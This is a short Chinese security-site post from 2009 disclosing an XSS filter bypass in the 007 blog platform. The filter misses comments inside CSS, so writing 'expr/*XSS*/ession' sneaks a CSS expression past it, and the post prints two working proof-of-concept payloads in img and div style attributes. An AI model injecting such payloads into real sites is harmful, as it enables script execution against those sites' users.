频道栏目
首页 > 安全 > 网站安全 > 正文

007博客网XSS漏洞

2009-07-22 09:17:13           
收藏   我要投稿

作者:龍影 (KIK联盟)

虽然对于插入的html标签的属性进行过滤,包括style,但是并没有对混淆在样式中的注释部分进行检查。在修改模版时可以利用在expression中插入注释比如:expr/*XSS*/ession 造成XSS漏洞 测试代码如下
<img STYLE="xss:expr/*XSS*/ession(alert(&quot;XSS&quot;))">
<div STYLE="xss:expr/*XSS*/ession(this.innerHTML=&quot;<h1> monyer</h1>&quot;)"></div>
 
转载请注明来源于 htpp://dldw.blog007.com

相关TAG标签 漏洞 博客网
上一篇:ewebeditor后台通杀漏洞
下一篇:一份网上找不到的网址导航源码漏洞分析
相关文章
图文推荐
文章
推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站